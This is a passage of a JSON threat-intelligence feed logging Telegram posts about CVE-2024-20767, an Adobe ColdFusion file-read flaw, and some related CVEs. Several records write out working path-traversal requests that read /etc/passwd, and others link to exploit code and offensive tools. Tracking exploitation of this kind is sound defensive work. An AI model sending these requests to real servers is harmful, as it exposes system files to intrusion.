"Telegram/CVnSh8FeEZazr4BxBEGuFaja2CW-j0zLqo9YEiZs1wbFWQ", "content": "", "creation_timestamp": "2024-05-21T06:35:53.000000Z"}, {"uuid": "928538e4-fe72-4091-9b72-aa2aa271b15b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/teamARXU/953", "content": "#Exploit for #CVE-2024-20767 - #Adobe \n\n~https://github.com/yoryio/CVE-2024-20767\n\n~https://github.com/Chocapikk/CVE-2024-20767\n\n#Team_ARXU", "creation_timestamp": "2024-05-16T20:42:14.000000Z"}, {"uuid": "670e6988-b743-4482-8ac7-b81cf7aa51af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/Teamx1945x/4297", "content": "CVE ID : CVE-2024-20767\nSystem : \nColdFusion versions 2023/6-2021/12\nType : reading Local files\n\nExploit \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644:\n\ncurl 'exmple.com/pms?module=logging&amp;file_name=../../../../../etc/passwd&amp;number_of_lines=100' -H 'uuid : exmple1oei-29eodj-ndke'\n\n\u0645\u0644\u0627\u062d\u0638\u0629 : \u064a\u062a\u0645 \u0627\u062e\u0630 \u0642\u064a\u0645\u0629 uuid \u0641\u064a \u0627\u0644\u0628\u0627\u0644\u0648\u062f \u0645\u0646 \u0643\u0648\u062f javascript \u0641\u064a \u0627\u0644\u0645\u0648\u0642\u0639\n\nNote : The value of uuid\u00a0 in this paylaod take it from javascript code from the targrt website\n\n#\u0627\u0633\u062a\u063a\u0644\u0627\u0644_\u062b\u063a\u0631\u0629", "creation_timestamp": "2024-04-21T09:52:23.000000Z"}, {"uuid": "4af0e149-36bf-4d4e-b202-2f0d0adda4d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/Teamx1945x/4306", "content": "CVE ID : CVE-2024-20767\nSystem : \nColdFusion versions 2023/6-2021/12\nType : reading Local files\n\nExploit \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644:\n\ncurl 'exmple.com/pms?module=logging&amp;file_name=../../../../../etc/passwd&amp;number_of_lines=100' -H 'uuid : exmple1oei-29eodj-ndke'\n\n\u0645\u0644\u0627\u062d\u0638\u0629 : \u064a\u062a\u0645 \u0627\u062e\u0630 \u0642\u064a\u0645\u0629 uuid \u0641\u064a \u0627\u0644\u0628\u0627\u0644\u0648\u062f \u0645\u0646 \u0643\u0648\u062f javascript \u0641\u064a \u0627\u0644\u0645\u0648\u0642\u0639\n\nNote : The value of uuid\u00a0 in this paylaod take it from javascript code from the targrt website\n\n#\u0627\u0633\u062a\u063a\u0644\u0627\u0644_\u062b\u063a\u0631\u0629", "creation_timestamp": "2024-04-21T09:54:41.000000Z"}, {"uuid": "081cd6d4-16d0-47e4-b128-c0dac654ce72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "Telegram/i8-BDEbJIbVlWi-Zzj_fsGKAHiAzP-US_11oLFeNtj5dZi0", "content": "", "creation_timestamp": "2024-03-30T13:58:34.000000Z"}, {"uuid": "322f70df-c2ac-480e-a608-c159b700e6ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/openSource3/69", "content": "CVE ID : CVE-2024-20767\nSystem : \nColdFusion versions 2023/6-2021/12\nType : reading Local files\n\nExploit \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644:\n\ncurl 'exmple.com/pms?module=logging&amp;file_name=../../../../../etc/passwd&amp;number_of_lines=100' -H 'uuid : exmple1oei-29eodj-ndke'\n\n\u0645\u0644\u0627\u062d\u0638\u0629 : \u064a\u062a\u0645 \u0627\u062e\u0630 \u0642\u064a\u0645\u0629 uuid \u0641\u064a \u0627\u0644\u0628\u0627\u0644\u0648\u062f \u0645\u0646 \u0643\u0648\u062f javascript \u0641\u064a \u0627\u0644\u0645\u0648\u0642\u0639\n\nNote : The value of uuid\u00a0 in this paylaod take it from javascript code from the targrt website\n\n#\u0627\u0633\u062a\u063a\u0644\u0627\u0644_\u062b\u063a\u0631\u0629", "creation_timestamp": "2024-04-14T08:52:45.000000Z"}, {"uuid": "0df0aa6d-debe-48d7-a47d-87c81a485648", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "https://t.me/scorpionisready/926", "content": "Remediation for CVE-2024-20767 and CVE-2024-21216: Protect Yourself Against Two Recent Critical Bugs Exploitable in the Wild\n\nhttps://blog.securelayer7.net/coldfusion-path-traversal-and-weblogic-unauthenticated-rce-remediation/", "creation_timestamp": "2024-11-25T21:18:52.000000Z"}, {"uuid": "5c6f0c14-f848-43b0-b401-37e12706e652", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/darkcommunityofficial/355", "content": "CVE-2024-20767 Adobe ColdFusion.\n*\nFile system read vulnerability", "creation_timestamp": "2024-03-28T04:08:58.000000Z"}, {"uuid": "b1478f9d-f2fa-4542-af4d-17a49cfb7663", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/darkcommunityofficial/345", "content": "https://github.com/yoryio/CVE-2024-20767\n\nExploit for CVE-2024-20767 - Adobe ColdFusion\n#github", "creation_timestamp": "2024-03-28T03:49:21.000000Z"}, {"uuid": "fc7fb0e7-fabd-47ea-9a8c-8b666741744f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "https://t.me/arpsyndicate/4929", "content": "#ExploitObserverAlert\n\nCVE-2024-20767\n\nDESCRIPTION: Exploit Observer has 51 entries in 10 file formats related to CVE-2024-20767. ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.\n\nFIRST-EPSS: 0.107660000\nNVD-IS: 4.2\nNVD-ES: 3.9\nARPS-PRIORITY: 0.9519815", "creation_timestamp": "2024-05-05T19:59:47.000000Z"}, {"uuid": "6bced72a-e777-4ad3-9580-b1dc57248ab5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "exploited", "source": "Telegram/ey9ZR7ZY7yO9SWUjZZkmRS0szmoVd0rlfLHop5pVrly9pA", "content": "", "creation_timestamp": "2024-12-17T08:32:56.000000Z"}, {"uuid": "58b9da15-f661-4183-b092-0093f1c1ae1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1958", "content": "CVE-2024-20767  Adobe ColdFusion\n*\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0447\u0442\u0435\u043d\u0438\u044f  \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b\n\n#adobe", "creation_timestamp": "2024-03-26T08:54:10.000000Z"}, {"uuid": "3739e22d-4271-420a-ad59-bddcb9e63f2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/GhostsForum/21615", "content": "Tools - Hackers Factory\n\nAn incredibly fast proxy checker &amp; IP rotator with ease. \n\nhttps://github.com/kitabisa/mubeng\n\n[CVE-2024-4956] Nexus Repository Manager 3 Unauthenticated Path Traversal Bulk Scanner \n\nhttps://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner/\n\nRepository to house markdown templates for researchers \n\nhttps://github.com/bugcrowd/templates\n\nPython for AWAE (Advanced Web Attacks and Exploitation) \n\nhttps://github.com/shreyaschavhan/python-for-awae\n\nA tool for collecting RDP, web and VNC screenshots all in one place \n\nhttps://github.com/nccgroup/scrying\n\nJeeves SQLI Finder \n\nhttps://github.com/ferreiraklet/Jeeves\n\nThe Frida-Jit-unPacker aims at helping researchers and analysts understand the behavior of packed malicious .NET samples. \n\nhttps://github.com/imperva/frida-jit-unpacker\n\nExploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv() \n\nhttps://github.com/ambionics/cnext-exploits?tab=readme-ov-file\n\n\u53bb\u4e2d\u5fc3\u5316\u8fdc\u7a0b\u63a7\u5236\u5de5\u5177\uff08Decentralized Remote Administration Tool\uff09\uff0c\u901a\u8fc7ENS\u5b9e\u73b0\u4e86\u914d\u7f6e\u6587\u4ef6\u5206\u53d1\u7684\u53bb\u4e2d\u5fc3\u5316\uff0c\u901a\u8fc7Telegram\u5b9e\u73b0\u4e86\u670d\u52a1\u7aef\u7684\u53bb\u4e2d\u5fc3\u5316 \n\nhttps://github.com/SpenserCai/DRat\n\nAbusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region. \n\nhttps://github.com/Offensive-Panda/RWX_MEMEORY_HUNT_AND_INJECTION_DV\n\nCollection of references to write-ups, blog posts and papers related to cybersecurity, reverse engineering and exploitation (constantly updated)\n\nhttps://github.com/0xor0ne/awesome-list/blob/main/topics/cybersec.md\n\nGitHub - yoryio/CVE-2024-20767: Exploit for CVE-2024-20767 - Adobe ColdFusion\n\nhttps://github.com/yoryio/CVE-2024-20767\n\nGitHub - TracecatHQ/tracecat: \ud83d\ude3c The open source alternative to Tines / Splunk SOAR. Build AI-assisted workflows, orchestrate alerts, and close cases fast.\n\nhttps://github.com/TracecatHQ/tracecat\n\nGitHub - sarperavci/CloudflareBypassForScraping: A cloudflare verification bypass script for webscraping\n\nhttps://github.com/sarperavci/CloudflareBypassForScraping\n\n#HackersFactory", "creation_timestamp": "2024-05-28T10:27:55.000000Z"}, {"uuid": "c75a77fc-e2d7-4644-85a4-d4555fee2323", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/156", "content": "Tools - Hackers Factory\n\nAn incredibly fast proxy checker &amp; IP rotator with ease. \n\nhttps://github.com/kitabisa/mubeng\n\n[CVE-2024-4956] Nexus Repository Manager 3 Unauthenticated Path Traversal Bulk Scanner \n\nhttps://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner/\n\nRepository to house markdown templates for researchers \n\nhttps://github.com/bugcrowd/templates\n\nPython for AWAE (Advanced Web Attacks and Exploitation) \n\nhttps://github.com/shreyaschavhan/python-for-awae\n\nA tool for collecting RDP, web and VNC screenshots all in one place \n\nhttps://github.com/nccgroup/scrying\n\nJeeves SQLI Finder \n\nhttps://github.com/ferreiraklet/Jeeves\n\nThe Frida-Jit-unPacker aims at helping researchers and analysts understand the behavior of packed malicious .NET samples. \n\nhttps://github.com/imperva/frida-jit-unpacker\n\nExploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv() \n\nhttps://github.com/ambionics/cnext-exploits?tab=readme-ov-file\n\n\u53bb\u4e2d\u5fc3\u5316\u8fdc\u7a0b\u63a7\u5236\u5de5\u5177\uff08Decentralized Remote Administration Tool\uff09\uff0c\u901a\u8fc7ENS\u5b9e\u73b0\u4e86\u914d\u7f6e\u6587\u4ef6\u5206\u53d1\u7684\u53bb\u4e2d\u5fc3\u5316\uff0c\u901a\u8fc7Telegram\u5b9e\u73b0\u4e86\u670d\u52a1\u7aef\u7684\u53bb\u4e2d\u5fc3\u5316 \n\nhttps://github.com/SpenserCai/DRat\n\nAbusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region. \n\nhttps://github.com/Offensive-Panda/RWX_MEMEORY_HUNT_AND_INJECTION_DV\n\nCollection of references to write-ups, blog posts and papers related to cybersecurity, reverse engineering and exploitation (constantly updated)\n\nhttps://github.com/0xor0ne/awesome-list/blob/main/topics/cybersec.md\n\nGitHub - yoryio/CVE-2024-20767: Exploit for CVE-2024-20767 - Adobe ColdFusion\n\nhttps://github.com/yoryio/CVE-2024-20767\n\nGitHub - TracecatHQ/tracecat: \ud83d\ude3c The open source alternative to Tines / Splunk SOAR. Build AI-assisted workflows, orchestrate alerts, and close cases fast.\n\nhttps://github.com/TracecatHQ/tracecat\n\nGitHub - sarperavci/CloudflareBypassForScraping: A cloudflare verification bypass script for webscraping\n\nhttps://github.com/sarperavci/CloudflareBypassForScraping\n\n#HackersFactory", "creation_timestamp": "2024-06-17T14:01:17.000000Z"}, {"uuid": "c4b29b5c-df69-48c3-b37f-d4abe0d093c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7825", "content": "Tools - Hackers Factory\n\nAn incredibly fast proxy checker &amp; IP rotator with ease. \n\nhttps://github.com/kitabisa/mubeng\n\n[CVE-2024-4956] Nexus Repository Manager 3 Unauthenticated Path Traversal Bulk Scanner \n\nhttps://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner/\n\nRepository to house markdown templates for researchers \n\nhttps://github.com/bugcrowd/templates\n\nPython for AWAE (Advanced Web Attacks and Exploitation) \n\nhttps://github.com/shreyaschavhan/python-for-awae\n\nA tool for collecting RDP, web and VNC screenshots all in one place \n\nhttps://github.com/nccgroup/scrying\n\nJeeves SQLI Finder \n\nhttps://github.com/ferreiraklet/Jeeves\n\nThe Frida-Jit-unPacker aims at helping researchers and analysts understand the behavior of packed malicious .NET samples. \n\nhttps://github.com/imperva/frida-jit-unpacker\n\nExploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv() \n\nhttps://github.com/ambionics/cnext-exploits?tab=readme-ov-file\n\n\u53bb\u4e2d\u5fc3\u5316\u8fdc\u7a0b\u63a7\u5236\u5de5\u5177\uff08Decentralized Remote Administration Tool\uff09\uff0c\u901a\u8fc7ENS\u5b9e\u73b0\u4e86\u914d\u7f6e\u6587\u4ef6\u5206\u53d1\u7684\u53bb\u4e2d\u5fc3\u5316\uff0c\u901a\u8fc7Telegram\u5b9e\u73b0\u4e86\u670d\u52a1\u7aef\u7684\u53bb\u4e2d\u5fc3\u5316 \n\nhttps://github.com/SpenserCai/DRat\n\nAbusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region. \n\nhttps://github.com/Offensive-Panda/RWX_MEMEORY_HUNT_AND_INJECTION_DV\n\nCollection of references to write-ups, blog posts and papers related to cybersecurity, reverse engineering and exploitation (constantly updated)\n\nhttps://github.com/0xor0ne/awesome-list/blob/main/topics/cybersec.md\n\nGitHub - yoryio/CVE-2024-20767: Exploit for CVE-2024-20767 - Adobe ColdFusion\n\nhttps://github.com/yoryio/CVE-2024-20767\n\nGitHub - TracecatHQ/tracecat: \ud83d\ude3c The open source alternative to Tines / Splunk SOAR. Build AI-assisted workflows, orchestrate alerts, and close cases fast.\n\nhttps://github.com/TracecatHQ/tracecat\n\nGitHub - sarperavci/CloudflareBypassForScraping: A cloudflare verification bypass script for webscraping\n\nhttps://github.com/sarperavci/CloudflareBypassForScraping\n\n#HackersFactory", "creation_timestamp": "2024-05-28T10:20:28.000000Z"}, {"uuid": "6dd81b81-9dcd-44b2-9fb7-8cae97ff644d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "Telegram/LL5rQXyIXgZDKsE1At5EpKGGWXSqUSzRBscaz1xKhTB-l_o", "content": "", "creation_timestamp": "2024-05-16T10:52:58.000000Z"}, {"uuid": "0e2d80e2-ece6-45c4-9e9c-918fd707595f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "https://t.me/ctinow/210496", "content": "https://ift.tt/JGkINR8\nCVE-2024-20767", "creation_timestamp": "2024-03-18T13:26:38.000000Z"}, {"uuid": "c76eb39d-f4f6-4e5d-8ac3-3729fc8f436e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6610", "content": "Tools - Hackers Factory\n\nAn incredibly fast proxy checker &amp; IP rotator with ease. \n\nhttps://github.com/kitabisa/mubeng\n\n[CVE-2024-4956] Nexus Repository Manager 3 Unauthenticated Path Traversal Bulk Scanner \n\nhttps://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner/\n\nRepository to house markdown templates for researchers \n\nhttps://github.com/bugcrowd/templates\n\nPython for AWAE (Advanced Web Attacks and Exploitation) \n\nhttps://github.com/shreyaschavhan/python-for-awae\n\nA tool for collecting RDP, web and VNC screenshots all in one place \n\nhttps://github.com/nccgroup/scrying\n\nJeeves SQLI Finder \n\nhttps://github.com/ferreiraklet/Jeeves\n\nThe Frida-Jit-unPacker aims at helping researchers and analysts understand the behavior of packed malicious .NET samples. \n\nhttps://github.com/imperva/frida-jit-unpacker\n\nExploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv() \n\nhttps://github.com/ambionics/cnext-exploits?tab=readme-ov-file\n\n\u53bb\u4e2d\u5fc3\u5316\u8fdc\u7a0b\u63a7\u5236\u5de5\u5177\uff08Decentralized Remote Administration Tool\uff09\uff0c\u901a\u8fc7ENS\u5b9e\u73b0\u4e86\u914d\u7f6e\u6587\u4ef6\u5206\u53d1\u7684\u53bb\u4e2d\u5fc3\u5316\uff0c\u901a\u8fc7Telegram\u5b9e\u73b0\u4e86\u670d\u52a1\u7aef\u7684\u53bb\u4e2d\u5fc3\u5316 \n\nhttps://github.com/SpenserCai/DRat\n\nAbusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region. \n\nhttps://github.com/Offensive-Panda/RWX_MEMEORY_HUNT_AND_INJECTION_DV\n\nCollection of references to write-ups, blog posts and papers related to cybersecurity, reverse engineering and exploitation (constantly updated)\n\nhttps://github.com/0xor0ne/awesome-list/blob/main/topics/cybersec.md\n\nGitHub - yoryio/CVE-2024-20767: Exploit for CVE-2024-20767 - Adobe ColdFusion\n\nhttps://github.com/yoryio/CVE-2024-20767\n\nGitHub - TracecatHQ/tracecat: \ud83d\ude3c The open source alternative to Tines / Splunk SOAR. Build AI-assisted workflows, orchestrate alerts, and close cases fast.\n\nhttps://github.com/TracecatHQ/tracecat\n\nGitHub - sarperavci/CloudflareBypassForScraping: A cloudflare verification bypass script for webscraping\n\nhttps://github.com/sarperavci/CloudflareBypassForScraping\n\n#HackersFactory", "creation_timestamp": "2024-05-28T10:20:28.000000Z"}, {"uuid": "d44fc49a-6f2e-426f-98a1-c2cfb8a3d360", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20768", "type": "seen", "source": "https://t.me/ctinow/210868", "content": "https://ift.tt/0ZxagDI\nCVE-2024-20768", "creation_timestamp": "2024-03-18T19:27:08.000000Z"}, {"uuid": "a87ff90e-0d52-4642-8315-2a1e0c39e317", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20764", "type": "seen", "source": "https://t.me/ctinow/210867", "content": "https://ift.tt/CqfVHez\nCVE-2024-20764", "creation_timestamp": "2024-03-18T19:27:07.000000Z"}, {"uuid": "aca205ce-acbd-4ed0-bd96-521ed40e28df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20763", "type": "seen", "source": "https://t.me/ctinow/210866", "content": "https://ift.tt/G5C1W9F\nCVE-2024-20763", "creation_timestamp": "2024-03-18T19:27:03.000000Z"}, {"uuid": "c062c31e-c0bb-4a45-9664-7067c9084eee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20762", "type": "seen", "source": "https://t.me/ctinow/210865", "content": "https://ift.tt/WlA0fzo\nCVE-2024-20762", "creation_timestamp": "2024-03-18T19:27:02.000000Z"}, {"uuid": "b4624a29-7d3a-45c3-9cc5-fbb4a6bae213", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20761", "type": "seen", "source": "https://t.me/ctinow/210864", "content": "https://ift.tt/4VGE1yC\nCVE-2024-20761", "creation_timestamp": "2024-03-18T19:27:01.000000Z"}, {"uuid": "bbe13866-4f2e-4a2b-a0d0-42d9a3968242", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "https://t.me/ctinow/210495", "content": "https://ift.tt/JGkINR8\nCVE-2024-20767", "creation_timestamp": "2024-03-18T13:21:35.000000Z"}, {"uuid": "2e5c746a-2949-4f9f-bcff-51915128e10d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20760", "type": "seen", "source": "https://t.me/ctinow/210863", "content": "https://ift.tt/3K8sLdS\nCVE-2024-20760", "creation_timestamp": "2024-03-18T19:27:00.000000Z"}, {"uuid": "673a22e6-7ce9-4009-b752-ee3712e3623c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/Kelvinseccommunity/38", "content": "https://github.com/yoryio/CVE-2024-20767\n\nExploit for CVE-2024-20767 - Adobe ColdFusion\n#github", "creation_timestamp": "2024-03-28T03:49:46.000000Z"}, {"uuid": "32e7ee8f-ab31-4e36-8b0b-fbabcfab1dd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-2076", "type": "seen", "source": "https://t.me/ctinow/197970", "content": "https://ift.tt/jsXLHrI\nCVE-2024-2076", "creation_timestamp": "2024-03-01T20:31:22.000000Z"}, {"uuid": "280ef206-f208-4744-a0a0-183fa0fee94d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-2076", "type": "seen", "source": "https://t.me/ctinow/197964", "content": "https://ift.tt/jsXLHrI\nCVE-2024-2076", "creation_timestamp": "2024-03-01T20:27:16.000000Z"}, {"uuid": "c2abdaa3-3ddc-4ee8-8d21-c9a532bce59d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20765", "type": "seen", "source": "https://t.me/ctinow/196901", "content": "https://ift.tt/Nfm3FZ7\nCVE-2024-20765", "creation_timestamp": "2024-02-29T18:31:59.000000Z"}, {"uuid": "bf020db3-9d00-4dcb-be1b-3a4325ca91b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20765", "type": "seen", "source": "https://t.me/ctinow/196902", "content": "https://ift.tt/Nfm3FZ7\nCVE-2024-20765", "creation_timestamp": "2024-02-29T18:32:00.000000Z"}, {"uuid": "440e278c-b55c-48ca-8224-c0b50feb8a40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "https://t.me/thebugbountyhunter/8522", "content": "ColdFusion Local File Read (CVE-2024-20767)\n\nhttps://www.youtube.com/watch?v=G9MhM7jGwrQ", "creation_timestamp": "2024-03-29T12:30:31.000000Z"}, {"uuid": "cfc2cdec-6379-4dc3-81e6-11ba7a2ff0f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3025", "content": "CVE-2024-20767\n\nGET /hax/../pms?module=logging&amp;file_name=../../../../../../../../../../../../../../../../../../etc/passwd&amp;number_of_lines=1000 HTTP/1.1\n\n#exploit #poc", "creation_timestamp": "2024-08-19T14:53:15.000000Z"}, {"uuid": "bac8b239-dbd5-49fc-918f-14cf10fe820a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "https://t.me/thebugbountyhunter/9346", "content": "Remediation for CVE-2024-20767 and CVE-2024-21216: Protect Yourself Against Two Recent Critical Bugs Exploitable in the Wild\n\nhttps://blog.securelayer7.net/coldfusion-path-traversal-and-weblogic-unauthenticated-rce-remediation/", "creation_timestamp": "2024-11-20T21:17:07.000000Z"}, {"uuid": "995294d9-ecfb-493b-8b04-a0b46165ef7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2182", "content": "https://github.com/yoryio/CVE-2024-20767\n\nExploit for CVE-2024-20767 - Adobe ColdFusion\n#github", "creation_timestamp": "2024-03-26T10:13:57.000000Z"}, {"uuid": "11156c79-b11c-4f79-ae5a-63ab665e08bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/8508", "content": "GitHub - yoryio/CVE-2024-20767: Exploit for CVE-2024-20767 - Adobe ColdFusion\n\nhttps://github.com/yoryio/CVE-2024-20767", "creation_timestamp": "2024-03-27T08:00:13.000000Z"}, {"uuid": "f7ff4744-4ec6-4437-8754-e318f2cff2d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "Telegram/cSOkjAp3DLcJJA8tKW3MRco8a-hUIhqr32mGYIvs8gJfTLPQ", "content": "", "creation_timestamp": "2024-08-26T13:47:08.000000Z"}, {"uuid": "1ef5a057-3b51-40c5-9ef3-a8acb18437ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2520", "content": "CVE-2024-20767\n\nGET /pms?module=logging&amp;file_name=../../../../../../../etc/passwd&amp;number_of_lines=100 HTTP/1.1\n\n#exploit #poc", "creation_timestamp": "2024-05-21T06:50:34.000000Z"}, {"uuid": "c4f0588a-c728-4683-98d6-4891d17e866a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "Telegram/uwJEZ_IncAjztNIG358Af22QGS4t7Jz6bBCG1_Ws_aqRrqXF", "content": "", "creation_timestamp": "2024-05-21T16:15:35.000000Z"}, {"uuid": "18fb0968-4bc0-49ef-be28-3206b5d63415", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/LearnExploit/6387", "content": "CVE-2024-20767  Adobe 